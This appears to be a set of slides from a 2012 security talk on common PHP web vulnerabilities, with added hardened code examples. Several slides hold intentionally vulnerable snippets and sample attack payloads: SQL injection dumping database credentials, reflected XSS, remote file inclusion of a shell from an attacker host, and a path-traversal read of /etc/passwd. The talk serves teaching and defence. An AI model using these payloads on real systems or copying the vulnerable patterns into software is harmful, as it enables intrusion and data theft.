These are the slides from a talk "Spot the Web Vulnerability" held at Hacktivity 2012 conference (Hungary / Budapest 12th–13th October 2012) by Miroslav Stampar.
2. Talk overview
Introduction to commonly exploited web application vulnerability classes (covering only those caused by coding mistake(s))
Usage of code review on real-life vulnerabilities as an educational tool
Mitigation in the form of remedies
Note: While the given examples discuss PHP code (due to its overwhelming popularity on the Web), the concepts also apply to any other web programming language
October 13th, 2012 2
5. SQL injection (1)
Vulnerability in dynamic database queries that include unfiltered user-supplied input
Usually the result of concatenating raw parameter values into the desired SQL statement
Various techniques are used depending on the target's environment and the affected vulnerable query
The goal is unauthorized access to the underlying database
Involved in 60% of all breach incidents examined by 7Safe in 2010
6. SQL injection (2)
Example of vulnerable code (vuln.php):
<?php
...
$sql = "SELECT * FROM forum_logs WHERE id = " . $_GET["id"];
$result = mysql_query($sql);
...
?>
Sample attack:
http://www.target.com/vuln.php?id=1 UNION ALL SELECT NULL,CONCAT(user,0x3a,password),NULL FROM mysql.user--
7. Cross-site scripting (1)
Enables attackers to inject client-side script into web pages viewed by other users
Everything from account hijacking, changing of user settings and cookie theft/poisoning to false advertising is possible
Persistent (stored) and non-persistent (reflected) variants
Samy (JS.Spacehero), the first known XSS worm, infected over 1 million MySpace profiles in less than 20 hours
8. Cross-site scripting (2)
Example of vulnerable code (vuln.php):
<?php
$name = $_GET['name'];
echo "Welcome $name<br>";
echo '<a href="http://www.site.com/">Click to Visit</a>';
?>
Sample attack:
http://www.target.com/vuln.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://www.attacker.com/";}</script>
9. File inclusion (1)
Allows inclusion of arbitrary code into the vulnerable application for further execution
Local file (LFI) and remote file (RFI) variants
Attacker's fondest wish (especially RFI)
Access to anything the original program context is able to access (configuration files, password files, etc.)
Involved in 21% of all web application attacks observed by Imperva in 2011
10. File inclusion (2)
Example of vulnerable code (vuln.php):
<?php
$page = 'index';
if (isset($_REQUEST['page']))
    $page = $_REQUEST['page'];
include($page . '.php');
?>
Sample attack:
http://www.target.com/vuln.php?page=http://www.attacker.com/shell.php?foo=
11. File disclosure (1)
Access to files that are not intended to be accessible, exposing their content to the attacker
Directory traversal variant in cases where characters for traversing to the parent directory (e.g. ../) are passed through to the file API(s)
Local file inclusion becomes a variant too when used to obtain non-script content
Easiest to exploit
12. File disclosure (2)
Example of vulnerable code (vuln.php):
<?php
$template = 'default.php';
if (isset($_COOKIE['template']))
    $template = $_COOKIE['template'];
readfile("templates/" . $template);
?>
Sample attack:
GET /vuln.php HTTP/1.0
Cookie: template=../../../../../../../../../etc/passwd
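Hardened counterparts of the include() on slide 10 and the readfile() on slide 12, added here as an example that is not part of the talk; the allow-list $ALLOWED_PAGES, the TEMPLATE_DIR constant and the two helper functions are names chosen for this example.

```php
<?php
// Added example (not from the talk): hardening slide 10 (file inclusion)
// and slide 12 (file disclosure). $ALLOWED_PAGES, TEMPLATE_DIR and the
// helper names are assumptions made for this example.

// Slide 10: never build the include path from the request. Map the parameter
// onto a fixed allow-list of files the application actually ships.
$ALLOWED_PAGES = ['index' => 'index.php', 'about' => 'about.php', 'contact' => 'contact.php'];

function resolve_page(array $allowed, ?string $requested): string
{
    // Any value not present as a key (including "http://..." or "../") falls
    // back to the default; the request value is only ever used as a lookup key.
    return $allowed[$requested] ?? $allowed['index'];
}

// Slide 12: when a filename really must come from the user, restrict its
// shape, canonicalize it and confirm it stays inside the intended directory.
const TEMPLATE_DIR = __DIR__ . '/templates';

function resolve_template(string $dir, string $requested): ?string
{
    // Plain filename only: no slashes, no "..", no NUL bytes.
    if (!preg_match('/^[A-Za-z0-9_-]+\.php$/', $requested)) {
        return null;
    }
    $base = realpath($dir);
    $path = realpath($dir . '/' . $requested);
    // realpath() is false for a missing file; the prefix check also catches
    // symlinks pointing outside $dir.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Usage mirroring the two vulnerable slides. Non-string input (e.g. page[]=x)
// is treated as absent rather than passed to the typed helpers.
$requested = $_REQUEST['page'] ?? null;
$page = resolve_page($ALLOWED_PAGES, is_string($requested) ? $requested : null);
include __DIR__ . '/' . $page;

$cookie = $_COOKIE['template'] ?? 'default.php';
$template = resolve_template(TEMPLATE_DIR, is_string($cookie) ? $cookie : '');
if ($template === null) {
    http_response_code(400);
    exit('Invalid template');
}
readfile($template);
```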
13. Remote code execution (1)
Provides a way to execute arbitrary code
In one variant the supplied code is executed inside the vulnerable web application (e.g. eval)
In the other, more common, variant the content of one of the request parameters is written to a browser-reachable file, giving the attacker the opportunity to run it as a standalone script
TimThumb WordPress PHP plugin vulnerability (CVE-2011-4106) affected 1.2 million websites
31. Remedies (1)
Data validation
Process of ensuring that the application is running with correct data
Discard the input if it doesn't pass the validation process
if (!preg_match('/^(\(\d{3}\))?[-\s.]?\d{3}[-\s.]\d{4}$/', $phone)) {
    echo "Your phone number is invalid";
    die();
}
32. Remedies (2)
Data sanitization
Removing any unwanted bits from the data and normalizing it to the correct form
$comment = strip_tags($_POST['comment']);
...
$id = intval($_GET['id']);
...
$username = preg_replace('/[^a-zA-Z0-9._]/', '', $_REQUEST['username']);
...
$query = sprintf("SELECT * FROM users WHERE user='%s' AND password='%s'",
    mysql_real_escape_string($user), mysql_real_escape_string($password));
33. Remedies (3)
Output escaping
Protecting the integrity of displayed data
Prevents the browser from applying any unintended meaning to special character sequences that may be found in the data
Always escape output provided by users!
echo "You searched for: " . htmlspecialchars($_GET["query"], ENT_QUOTES);
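The vulnerable page from slide 8 rewritten with the output escaping of slide 33, plus the one place where escaping alone is not the right tool (a user-supplied URL in href). This is an added example, not code from the talk; the helpers e() and safe_url() are names chosen here.

```php
<?php
// Added example (not from the talk): slide 8 with output escaping applied.
// e() and safe_url() are helper names chosen for this example, not PHP built-ins.

// Escape for HTML text or a quoted attribute value. ENT_QUOTES covers both
// " and ', so the result is safe in either quoting style; ENT_SUBSTITUTE
// keeps invalid UTF-8 from turning the whole output into an empty string.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Escaping does not validate meaning: a scheme such as "javascript:" survives
// htmlspecialchars() untouched, so a URL destined for href needs its own check.
// Only absolute http(s) URLs are accepted here; anything else yields null.
function safe_url(string $url): ?string
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

$name = is_string($_GET['name'] ?? null) ? $_GET['name'] : 'guest';

// Text context: the <script> payload from slide 8 is emitted as
// &lt;script&gt;... and is rendered as literal text, never executed.
echo 'Welcome ' . e($name) . '<br>';

// Attribute context: the same helper keeps the value inside the attribute.
echo '<a href="http://www.site.com/" title="' . e($name) . '">Click to Visit</a>';

// URL context: validate the scheme first, then escape for the attribute.
$next = safe_url(is_string($_GET['next'] ?? null) ? $_GET['next'] : '') ?? 'http://www.site.com/';
echo '<a href="' . e($next) . '">Continue</a>';
```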
34. Remedies (4)
Safe communication with a database
Prepared statements use one channel for commands and another for data (data is never interpreted as commands)
$db = new PDO('dblib:host=localhost; dbname=testdb; charset=UTF-8', $user, $pass);
$query = 'SELECT * FROM users WHERE id = :id';
$stmt = $db->prepare($query);
$stmt->bindValue(':id', $_REQUEST['id']);
$stmt->execute();
while($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
...
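The forum_logs query from slide 6 rewritten with the validation of slide 31 and the prepared statement of slide 34, as an added example that is not code from the talk. Connection details are placeholders; the example also switches off PDO's client-side prepare emulation, which the MySQL driver enables by default and which would otherwise undercut the "two channels" property described above.

```php
<?php
// Added example (not from the talk): slide 6 (forum_logs lookup) done safely.
// Host, database and credential values are placeholders.
$db = new PDO(
    'mysql:host=localhost;dbname=testdb;charset=utf8mb4',
    'DB_USER_PLACEHOLDER',
    'DB_PASS_PLACEHOLDER',
    [
        // Fail loudly instead of returning false and continuing with garbage.
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        // The MySQL driver emulates prepares by default, interpolating values
        // client-side. Disable that so statement text and parameters really
        // travel as separate protocol messages, as slide 34 describes.
        PDO::ATTR_EMULATE_PREPARES => false,
    ]
);

// Validate first (slide 31): id must be a positive integer. Anything appended
// to "1" (the UNION payload of slide 6 included) fails here, before any
// query text exists.
$id = filter_var($_GET['id'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($id === false) {
    http_response_code(400);
    exit('Invalid id');
}

// The SQL text contains no user data; the single value is bound with an
// explicit type rather than concatenated.
$stmt = $db->prepare('SELECT * FROM forum_logs WHERE id = :id');
$stmt->bindValue(':id', $id, PDO::PARAM_INT);
$stmt->execute();

foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row) {
    // Output escaping (slide 33) still applies when stored rows are rendered.
    echo htmlspecialchars((string) $row['id'], ENT_QUOTES, 'UTF-8'), '<br>';
}
```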